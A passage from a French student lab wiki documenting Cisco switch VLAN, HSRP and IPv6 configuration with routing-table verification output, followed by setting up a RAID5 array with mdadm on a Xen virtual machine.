 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
